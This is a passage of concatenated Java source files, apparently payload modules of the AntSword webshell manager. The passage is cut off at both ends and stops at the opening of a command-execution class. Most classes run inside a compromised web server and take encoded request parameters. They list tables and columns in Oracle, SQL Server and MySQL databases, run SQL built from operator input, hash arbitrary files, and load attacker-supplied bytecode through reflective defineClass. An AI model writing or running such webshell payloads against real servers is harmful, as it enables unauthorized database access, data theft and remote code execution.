82 | Socket socket = null;
83 | try {
84 | String[] inet = addr.split(":");
85 | socket = new Socket();
86 | socket.setReuseAddress(true);
87 | socket.setKeepAlive(false);
88 | socket.setTcpNoDelay(true);
89 | socket.setSoLinger(true, 0);
90 | socket.connect(new InetSocketAddress(inet[0], Integer.parseInt(inet[1])), 30);
91 | socket.setSoTimeout(30);
92 | return socket;
93 | } catch (Exception ex) {
94 | if (socket != null) {
95 | socket.close();
96 | }
97 | ex.printStackTrace();
98 | throw ex;
99 | }
100 | }
101 |
102 | public void parseObj(Object obj) {
103 | if (obj.getClass().isArray()) {
104 | Object[] data = (Object[]) obj;
105 | request = data[0];
106 | response = data[1];
107 | } else {
108 | try {
109 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
110 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
111 | } catch (Exception e) {
112 | request = obj;
113 | try {
114 | Field req = request.getClass().getDeclaredField("request");
115 | req.setAccessible(true);
116 | Object request2 = req.get(request);
117 | Field resp = request2.getClass().getDeclaredField("response");
118 | resp.setAccessible(true);
119 | response = resp.get(request2);
120 | } catch (Exception ex) {
121 | try {
122 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
123 | } catch (Exception ignored) {
124 |
125 | }
126 | }
127 | }
128 | }
129 | }
130 |
131 | public String asoutput(String str) {
132 | try {
133 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
134 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
135 | defineClassMethod.setAccessible(true);
136 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
137 | return cc.getConstructor(String.class).newInstance(str).toString();
138 | } catch (Exception e) {
139 | return str;
140 | }
141 | }
142 |
143 | public byte[] Base64DecodeToByte(String str) {
144 | byte[] bt = null;
145 | String version = System.getProperty("java.version");
146 | try {
147 | if (version.compareTo("1.9") >= 0) {
148 | Class clazz = Class.forName("java.util.Base64");
149 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
150 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
151 | } else {
152 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
153 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
154 | }
155 | return bt;
156 | } catch (Exception e) {
157 | return new byte[]{};
158 | }
159 | }
160 | }
161 |
--------------------------------------------------------------------------------
/src/database/oracle/Show_tables.java:
--------------------------------------------------------------------------------
1 | package database.oracle;
2 |
3 | import java.lang.reflect.Field;
4 | import java.sql.*;
5 |
6 | public class Show_tables {
7 | public Object request = null;
8 | public Object response = null;
9 | public String encoder = "base64";
10 | public String cs = "antswordCharset";
11 | public String randomPrefix = "antswordrandomPrefix";
12 | public String decoderClassdata;
13 |
14 | @Override
15 | public boolean equals(Object obj) {
16 | this.parseObj(obj);
17 | StringBuffer output = new StringBuffer();
18 | String tag_s = "->|";
19 | String tag_e = "|<-";
20 | String varkey1 = "antswordargencode";
21 | String varkey2 = "antswordargconn";
22 | String varkey3 = "antswordargdb";
23 | String varkeydecoder = "antswordargdecoder";
24 |
25 | try {
26 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
27 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
28 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
29 | String z1 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey1));
30 | String z2 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey2));
31 | String z3 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey3));
32 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
33 | output.append(showTables(z1, z2, z3));
34 | } catch (Exception e) {
35 | output.append("ERROR:// " + e);
36 | }
37 | try {
38 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
39 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
40 | } catch (Exception ignored) {
41 | }
42 | return true;
43 | }
44 |
45 | String decode(String str) throws Exception {
46 | int prefixlen = 0;
47 | try {
48 | prefixlen = Integer.parseInt(randomPrefix);
49 | str = str.substring(prefixlen);
50 | } catch (Exception e) {
51 | prefixlen = 0;
52 | }
53 | if (encoder.equals("base64")) {
54 | return new String(this.Base64DecodeToByte(str), this.cs);
55 | }
56 | return str;
57 | }
58 |
59 | String executeSQL(String encode, String conn, String sql, String columnsep, String rowsep, boolean needcoluname)
60 | throws Exception {
61 | String ret = "";
62 | String[] x = conn.trim().replace("\r\n", "\n").split("\n");
63 | Class.forName(x[0].trim());
64 | String url = x[1];
65 | Connection c = DriverManager.getConnection(url, x[2], x[3]);
66 | Statement stmt = c.createStatement();
67 | ResultSet rs = stmt.executeQuery(sql);
68 | ResultSetMetaData rsmd = rs.getMetaData();
69 |
70 | if (needcoluname) {
71 | for (int i = 1; i <= rsmd.getColumnCount(); i++) {
72 | String columnName = rsmd.getColumnName(i);
73 | ret += columnName + columnsep;
74 | }
75 | ret += rowsep;
76 | }
77 |
78 | while (rs.next()) {
79 | for (int i = 1; i <= rsmd.getColumnCount(); i++) {
80 | String columnValue = rs.getString(i);
81 | ret += columnValue + columnsep;
82 | }
83 | ret += rowsep;
84 | }
85 | return ret;
86 | }
87 |
88 | String showTables(String encode, String conn, String dbname) throws Exception {
89 | String sql = "SELECT TABLE_NAME FROM (SELECT TABLE_NAME FROM ALL_TABLES WHERE OWNER='" + dbname + "' ORDER BY 1)";
90 | String columnsep = "\t";
91 | String rowsep = "";
92 | return executeSQL(encode, conn, sql, columnsep, rowsep, false);
93 | }
94 |
95 | public void parseObj(Object obj) {
96 | if (obj.getClass().isArray()) {
97 | Object[] data = (Object[]) obj;
98 | request = data[0];
99 | response = data[1];
100 | } else {
101 | try {
102 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
103 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
104 | } catch (Exception e) {
105 | request = obj;
106 | try {
107 | Field req = request.getClass().getDeclaredField("request");
108 | req.setAccessible(true);
109 | Object request2 = req.get(request);
110 | Field resp = request2.getClass().getDeclaredField("response");
111 | resp.setAccessible(true);
112 | response = resp.get(request2);
113 | } catch (Exception ex) {
114 | try {
115 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
116 | } catch (Exception ignored) {
117 |
118 | }
119 | }
120 | }
121 | }
122 | }
123 |
124 | public String asoutput(String str) {
125 | try {
126 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
127 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
128 | defineClassMethod.setAccessible(true);
129 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
130 | return cc.getConstructor(String.class).newInstance(str).toString();
131 | } catch (Exception e) {
132 | return str;
133 | }
134 | }
135 |
136 | public byte[] Base64DecodeToByte(String str) {
137 | byte[] bt = null;
138 | String version = System.getProperty("java.version");
139 | try {
140 | if (version.compareTo("1.9") >= 0) {
141 | Class clazz = Class.forName("java.util.Base64");
142 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
143 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
144 | } else {
145 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
146 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
147 | }
148 | return bt;
149 | } catch (Exception e) {
150 | return new byte[]{};
151 | }
152 | }
153 | }
--------------------------------------------------------------------------------
/src/database/sqlserver/Show_columns.java:
--------------------------------------------------------------------------------
1 | package database.sqlserver;
2 |
3 | import java.lang.reflect.Field;
4 | import java.sql.*;
5 |
6 | public class Show_columns {
7 | public Object request = null;
8 | public Object response = null;
9 | public String encoder = "base64";
10 | public String cs = "antswordCharset";
11 | public String randomPrefix = "antswordrandomPrefix";
12 | public String decoderClassdata;
13 |
14 | @Override
15 | public boolean equals(Object obj) {
16 | this.parseObj(obj);
17 | StringBuffer output = new StringBuffer();
18 | String tag_s = "->|";
19 | String tag_e = "|<-";
20 | String varkey1 = "antswordargencode";
21 | String varkey2 = "antswordargconn";
22 | String varkey3 = "antswordargdb";
23 | String varkey4 = "antswordargtable";
24 | String varkeydecoder = "antswordargdecoder";
25 |
26 | try {
27 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
28 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
29 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
30 | String z1 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey1));
31 | String z2 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey2));
32 | String z3 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey3));
33 | String z4 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey4));
34 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
35 | output.append(showColumns(z1, z2, z3, z4));
36 | } catch (Exception e) {
37 | output.append("ERROR:// " + e);
38 | }
39 | try {
40 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
41 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
42 | } catch (Exception ignored) {
43 | }
44 | return true;
45 | }
46 |
47 | String decode(String str) throws Exception {
48 | int prefixlen = 0;
49 | try {
50 | prefixlen = Integer.parseInt(randomPrefix);
51 | str = str.substring(prefixlen);
52 | } catch (Exception e) {
53 | prefixlen = 0;
54 | }
55 | if (encoder.equals("base64")) {
56 | return new String(this.Base64DecodeToByte(str), this.cs);
57 | }
58 | return str;
59 | }
60 |
61 | String executeSQL(String encode, String conn, String sql, String columnsep, String rowsep, boolean needcoluname)
62 | throws Exception {
63 | String ret = "";
64 | String[] x = conn.trim().replace("\r\n", "\n").split("\n");
65 | Class.forName(x[0].trim());
66 | String url = x[1];
67 | Connection c = DriverManager.getConnection(url);
68 | Statement stmt = c.createStatement();
69 | ResultSet rs = stmt.executeQuery(sql);
70 | ResultSetMetaData rsmd = rs.getMetaData();
71 |
72 | if (needcoluname) {
73 | for (int i = 1; i <= rsmd.getColumnCount(); i++) {
74 | String columnName = rsmd.getColumnName(i);
75 | ret += columnName + columnsep;
76 | }
77 | ret += rowsep;
78 | }
79 |
80 | while (rs.next()) {
81 | for (int i = 1; i <= rsmd.getColumnCount(); i++) {
82 | String columnValue = rs.getString(i);
83 | ret += columnValue + columnsep;
84 | }
85 | ret += rowsep;
86 | }
87 | return ret;
88 | }
89 |
90 | String showColumns(String encode, String conn, String dbname, String table) throws Exception {
91 | String columnsep = "\t";
92 | String rowsep = "";
93 | String sql = "SELECT TOP 1 * FROM " + dbname + "." + table;
94 | return executeSQL(encode, conn, sql, columnsep, rowsep, true);
95 | }
96 |
97 | public void parseObj(Object obj) {
98 | if (obj.getClass().isArray()) {
99 | Object[] data = (Object[]) obj;
100 | request = data[0];
101 | response = data[1];
102 | } else {
103 | try {
104 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
105 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
106 | } catch (Exception e) {
107 | request = obj;
108 | try {
109 | Field req = request.getClass().getDeclaredField("request");
110 | req.setAccessible(true);
111 | Object request2 = req.get(request);
112 | Field resp = request2.getClass().getDeclaredField("response");
113 | resp.setAccessible(true);
114 | response = resp.get(request2);
115 | } catch (Exception ex) {
116 | try {
117 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
118 | } catch (Exception ignored) {
119 |
120 | }
121 | }
122 | }
123 | }
124 | }
125 |
126 | public String asoutput(String str) {
127 | try {
128 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
129 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
130 | defineClassMethod.setAccessible(true);
131 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
132 | return cc.getConstructor(String.class).newInstance(str).toString();
133 | } catch (Exception e) {
134 | return str;
135 | }
136 | }
137 |
138 | public byte[] Base64DecodeToByte(String str) {
139 | byte[] bt = null;
140 | String version = System.getProperty("java.version");
141 | try {
142 | if (version.compareTo("1.9") >= 0) {
143 | Class clazz = Class.forName("java.util.Base64");
144 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
145 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
146 | } else {
147 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
148 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
149 | }
150 | return bt;
151 | } catch (Exception e) {
152 | return new byte[]{};
153 | }
154 | }
155 | }
--------------------------------------------------------------------------------
/src/database/oracle/Show_columns.java:
--------------------------------------------------------------------------------
1 | package database.oracle;
2 |
3 | import java.lang.reflect.Field;
4 | import java.sql.*;
5 |
6 | public class Show_columns {
7 | public Object request = null;
8 | public Object response = null;
9 | public String encoder = "base64";
10 | public String cs = "antswordCharset";
11 | public String randomPrefix = "antswordrandomPrefix";
12 | public String decoderClassdata;
13 |
14 | @Override
15 | public boolean equals(Object obj) {
16 | this.parseObj(obj);
17 | StringBuffer output = new StringBuffer();
18 |
19 | String tag_s = "->|";
20 | String tag_e = "|<-";
21 | String varkey1 = "antswordargencode";
22 | String varkey2 = "antswordargconn";
23 | String varkey3 = "antswordargdb";
24 | String varkey4 = "antswordargtable";
25 | String varkeydecoder = "antswordargdecoder";
26 |
27 | try {
28 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
29 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
30 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
31 | String z1 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey1));
32 | String z2 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey2));
33 | String z3 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey3));
34 | String z4 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey4));
35 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
36 | output.append(showColumns(z1, z2, z3, z4));
37 | } catch (Exception e) {
38 | output.append("ERROR:// " + e);
39 | }
40 | try {
41 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
42 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
43 | } catch (Exception ignored) {
44 | }
45 | return true;
46 | }
47 |
48 | String decode(String str) throws Exception {
49 | int prefixlen = 0;
50 | try {
51 | prefixlen = Integer.parseInt(randomPrefix);
52 | str = str.substring(prefixlen);
53 | } catch (Exception e) {
54 | prefixlen = 0;
55 | }
56 | if (encoder.equals("base64")) {
57 | return new String(this.Base64DecodeToByte(str), this.cs);
58 | }
59 | return str;
60 | }
61 |
62 | String executeSQL(String encode, String conn, String sql, String columnsep, String rowsep, boolean needcoluname)
63 | throws Exception {
64 | String ret = "";
65 | String[] x = conn.trim().replace("\r\n", "\n").split("\n");
66 | Class.forName(x[0].trim());
67 | String url = x[1];
68 | Connection c = DriverManager.getConnection(url, x[2], x[3]);
69 | Statement stmt = c.createStatement();
70 | ResultSet rs = stmt.executeQuery(sql);
71 | ResultSetMetaData rsmd = rs.getMetaData();
72 |
73 | if (needcoluname) {
74 | for (int i = 1; i <= rsmd.getColumnCount(); i++) {
75 | String columnName = rsmd.getColumnName(i);
76 | ret += columnName + columnsep;
77 | }
78 | ret += rowsep;
79 | }
80 |
81 | while (rs.next()) {
82 | for (int i = 1; i <= rsmd.getColumnCount(); i++) {
83 | String columnValue = rs.getString(i);
84 | ret += columnValue + columnsep;
85 | }
86 | ret += rowsep;
87 | }
88 | return ret;
89 | }
90 |
91 | String showColumns(String encode, String conn, String dbname, String table) throws Exception {
92 | String columnsep = "\t";
93 | String rowsep = "";
94 | String sql = "select * from " + dbname + "." + table + " WHERE ROWNUM=0";
95 | return executeSQL(encode, conn, sql, columnsep, rowsep, true);
96 | }
97 |
98 | public void parseObj(Object obj) {
99 | if (obj.getClass().isArray()) {
100 | Object[] data = (Object[]) obj;
101 | request = data[0];
102 | response = data[1];
103 | } else {
104 | try {
105 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
106 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
107 | } catch (Exception e) {
108 | request = obj;
109 | try {
110 | Field req = request.getClass().getDeclaredField("request");
111 | req.setAccessible(true);
112 | Object request2 = req.get(request);
113 | Field resp = request2.getClass().getDeclaredField("response");
114 | resp.setAccessible(true);
115 | response = resp.get(request2);
116 | } catch (Exception ex) {
117 | try {
118 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
119 | } catch (Exception ignored) {
120 |
121 | }
122 | }
123 | }
124 | }
125 | }
126 |
127 | public String asoutput(String str) {
128 | try {
129 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
130 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
131 | defineClassMethod.setAccessible(true);
132 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
133 | return cc.getConstructor(String.class).newInstance(str).toString();
134 | } catch (Exception e) {
135 | return str;
136 | }
137 | }
138 |
139 | public byte[] Base64DecodeToByte(String str) {
140 | byte[] bt = null;
141 | String version = System.getProperty("java.version");
142 | try {
143 | if (version.compareTo("1.9") >= 0) {
144 | Class clazz = Class.forName("java.util.Base64");
145 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
146 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
147 | } else {
148 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
149 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
150 | }
151 | return bt;
152 | } catch (Exception e) {
153 | return new byte[]{};
154 | }
155 | }
156 | }
--------------------------------------------------------------------------------
/src/database/mysql/Show_columns.java:
--------------------------------------------------------------------------------
1 | package database.mysql;
2 |
3 | import java.lang.reflect.Field;
4 | import java.sql.*;
5 |
6 | public class Show_columns {
7 | public Object request = null;
8 | public Object response = null;
9 | public String encoder = "base64";
10 | public String cs = "antswordCharset";
11 | public String randomPrefix = "antswordrandomPrefix";
12 | public String decoderClassdata;
13 |
14 | @Override
15 | public boolean equals(Object obj) {
16 | this.parseObj(obj);
17 | StringBuffer output = new StringBuffer();
18 | String tag_s = "->|";
19 | String tag_e = "|<-";
20 | String varkey1 = "antswordargencode";
21 | String varkey2 = "antswordargconn";
22 | String varkey3 = "antswordargdb";
23 | String varkey4 = "antswordargtable";
24 | String varkeydecoder = "antswordargdecoder";
25 | try {
26 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
27 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
28 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
29 | String z1 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey1));
30 | String z2 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey2));
31 | String z3 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey3));
32 | String z4 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey4));
33 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
34 | output.append(showColumns(z1, z2, z3, z4));
35 |
36 | } catch (Exception e) {
37 | output.append("ERROR:// " + e);
38 | }
39 | try {
40 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
41 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
42 | } catch (Exception ignored) {
43 | }
44 | return true;
45 | }
46 |
47 | String decode(String str) throws Exception {
48 | int prefixlen = 0;
49 | try {
50 | prefixlen = Integer.parseInt(randomPrefix);
51 | str = str.substring(prefixlen);
52 | } catch (Exception e) {
53 | prefixlen = 0;
54 | }
55 | if (encoder.equals("base64")) {
56 | return new String(this.Base64DecodeToByte(str), this.cs);
57 | }
58 | return str;
59 | }
60 |
61 | String executeSQL(String encode, String conn, String sql, String columnsep, String rowsep, boolean needcoluname)
62 | throws Exception {
63 | String ret = "";
64 | String[] x = conn.trim().replace("\r\n", "\n").split("\n");
65 | Class.forName(x[0].trim());
66 | String url = x[1] + "&characterEncoding=" + encode;
67 | Connection c = DriverManager.getConnection(url);
68 | Statement stmt = c.createStatement();
69 | ResultSet rs = stmt.executeQuery(sql);
70 | ResultSetMetaData rsmd = rs.getMetaData();
71 |
72 | if (needcoluname) {
73 | for (int i = 1; i <= rsmd.getColumnCount(); i++) {
74 | String columnName = rsmd.getColumnName(i);
75 | ret += columnName + columnsep;
76 | }
77 | ret += rowsep;
78 | }
79 |
80 | while (rs.next()) {
81 | for (int i = 1; i <= rsmd.getColumnCount(); i++) {
82 | String columnValue = rs.getString(i);
83 | ret += columnValue + columnsep;
84 | }
85 | ret += rowsep;
86 | }
87 | return ret;
88 | }
89 |
90 | String showColumns(String encode, String conn, String dbname, String table) throws Exception {
91 | String columnsep = "\t";
92 | String rowsep = "";
93 | String sql = "select * from `" + dbname + "`.`" + table + "` limit 0,0";
94 | return executeSQL(encode, conn, sql, columnsep, rowsep, true);
95 | }
96 |
97 | public void parseObj(Object obj) {
98 | if (obj.getClass().isArray()) {
99 | Object[] data = (Object[]) obj;
100 | request = data[0];
101 | response = data[1];
102 | } else {
103 | try {
104 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
105 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
106 | } catch (Exception e) {
107 | request = obj;
108 | try {
109 | Field req = request.getClass().getDeclaredField("request");
110 | req.setAccessible(true);
111 | Object request2 = req.get(request);
112 | Field resp = request2.getClass().getDeclaredField("response");
113 | resp.setAccessible(true);
114 | response = resp.get(request2);
115 | } catch (Exception ex) {
116 | try {
117 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
118 | } catch (Exception ignored) {
119 |
120 | }
121 | }
122 | }
123 | }
124 | }
125 |
126 | public String asoutput(String str) {
127 | try {
128 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
129 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
130 | defineClassMethod.setAccessible(true);
131 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
132 | return cc.getConstructor(String.class).newInstance(str).toString();
133 | } catch (Exception e) {
134 | return str;
135 | }
136 | }
137 |
138 | public byte[] Base64DecodeToByte(String str) {
139 | byte[] bt = null;
140 | String version = System.getProperty("java.version");
141 | try {
142 | if (version.compareTo("1.9") >= 0) {
143 | Class clazz = Class.forName("java.util.Base64");
144 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
145 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
146 | } else {
147 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
148 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
149 | }
150 | return bt;
151 | } catch (Exception e) {
152 | return new byte[]{};
153 | }
154 | }
155 | }
--------------------------------------------------------------------------------
/src/filemanager/Filehash.java:
--------------------------------------------------------------------------------
1 | package filemanager;
2 |
3 | import java.io.FileInputStream;
4 | import java.io.IOException;
5 | import java.io.InputStream;
6 | import java.lang.reflect.Field;
7 | import java.security.MessageDigest;
8 | import java.security.NoSuchAlgorithmException;
9 |
10 | public class Filehash {
11 | public Object request = null;
12 | public Object response = null;
13 | public String encoder = "base64";
14 | public String cs = "antswordCharset";
15 | public String randomPrefix = "antswordrandomPrefix";
16 | public String decoderClassdata;
17 | private static final int STREAM_BUFFER_LENGTH = 1024;
18 |
19 | @Override
20 | public boolean equals(Object obj) {
21 | this.parseObj(obj);
22 |
23 | StringBuffer output = new StringBuffer();
24 | String tag_s = "->|";
25 | String tag_e = "|<-";
26 | String varkey1 = "antswordargpath";
27 | String varkeydecoder = "antswordargdecoder";
28 |
29 | try {
30 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
31 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
32 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
33 | String z1 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey1));
34 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
35 | output.append(FileHashCode(z1));
36 | } catch (Exception e) {
37 | output.append("ERROR:// " + e);
38 | }
39 | try {
40 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
41 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
42 | } catch (Exception ignored) {
43 | }
44 | return true;
45 | }
46 |
47 | public static MessageDigest getMd5Digest() {
48 | return getDigest("MD5");
49 | }
50 |
51 | public static MessageDigest getDigest(final String algorithm) {
52 | try {
53 | return MessageDigest.getInstance(algorithm);
54 | } catch (final NoSuchAlgorithmException e) {
55 | throw new IllegalArgumentException(e);
56 | }
57 | }
58 |
59 | public static byte[] digest(final MessageDigest messageDigest, final InputStream data) throws IOException {
60 | return updateDigest(messageDigest, data).digest();
61 | }
62 |
63 | public static MessageDigest updateDigest(final MessageDigest digest, final InputStream inputStream)
64 | throws IOException {
65 | final byte[] buffer = new byte[STREAM_BUFFER_LENGTH];
66 | int read = inputStream.read(buffer, 0, STREAM_BUFFER_LENGTH);
67 |
68 | while (read > -1) {
69 | digest.update(buffer, 0, read);
70 | read = inputStream.read(buffer, 0, STREAM_BUFFER_LENGTH);
71 | }
72 | return digest;
73 | }
74 |
75 | public static byte[] md5(final InputStream data) throws IOException {
76 | return digest(getMd5Digest(), data);
77 | }
78 |
79 | public static String md5Hex(final InputStream data) throws IOException {
80 | return encodeHex(md5(data));
81 | }
82 |
83 | static String encodeHex(byte[] bytes) {
84 | String h = "0123456789ABCDEF";
85 | StringBuilder sb = new StringBuilder(bytes.length * 2);
86 | for (int i = 0; i < bytes.length; i++) {
87 | sb.append(h.charAt((bytes[i] & 0xf0) >> 4));
88 | sb.append(h.charAt((bytes[i] & 0x0f) >> 0));
89 | }
90 | return sb.toString();
91 | }
92 |
93 | String decode(String str) throws Exception {
94 | int prefixlen = 0;
95 | try {
96 | prefixlen = Integer.parseInt(randomPrefix);
97 | str = str.substring(prefixlen);
98 | } catch (Exception e) {
99 | }
100 | if (encoder.equals("base64")) {
101 | return new String(this.Base64DecodeToByte(str), this.cs);
102 | }
103 | return str;
104 | }
105 |
106 | String FileHashCode(String filePath) throws Exception {
107 | String s = "";
108 | String md5s = md5Hex(new FileInputStream(filePath));
109 | s += "MD5\t" + md5s + "\n";
110 | return s;
111 | }
112 |
113 | public void parseObj(Object obj) {
114 | if (obj.getClass().isArray()) {
115 | Object[] data = (Object[]) obj;
116 | request = data[0];
117 | response = data[1];
118 | } else {
119 | try {
120 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
121 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
122 | } catch (Exception e) {
123 | request = obj;
124 | try {
125 | Field req = request.getClass().getDeclaredField("request");
126 | req.setAccessible(true);
127 | Object request2 = req.get(request);
128 | Field resp = request2.getClass().getDeclaredField("response");
129 | resp.setAccessible(true);
130 | response = resp.get(request2);
131 | } catch (Exception ex) {
132 | try {
133 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
134 | } catch (Exception ignored) {
135 |
136 | }
137 | }
138 | }
139 | }
140 | }
141 |
142 | public String asoutput(String str) {
143 | try {
144 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
145 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
146 | defineClassMethod.setAccessible(true);
147 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
148 | return cc.getConstructor(String.class).newInstance(str).toString();
149 | } catch (Exception e) {
150 | return str;
151 | }
152 | }
153 |
154 | public byte[] Base64DecodeToByte(String str) {
155 | byte[] bt = null;
156 | String version = System.getProperty("java.version");
157 | try {
158 | if (version.compareTo("1.9") >= 0) {
159 | Class clazz = Class.forName("java.util.Base64");
160 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
161 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
162 | } else {
163 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
164 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
165 | }
166 | return bt;
167 | } catch (Exception e) {
168 | return new byte[]{};
169 | }
170 | }
171 | }
172 |
--------------------------------------------------------------------------------
/src/command/Exec.java:
--------------------------------------------------------------------------------
1 | package command;
2 |
3 | import java.io.BufferedReader;
4 | import java.io.ByteArrayOutputStream;
5 | import java.io.InputStream;
6 | import java.io.InputStreamReader;
7 | import java.lang.reflect.Field;
8 | import java.util.HashMap;
9 | import java.util.Map;
10 |
11 | public class Exec {
12 | public Object request = null;
13 | public Object response = null;
14 | public String encoder = "base64";
15 | public String cs = "antswordCharset";
16 | public String randomPrefix = "antswordrandomPrefix";
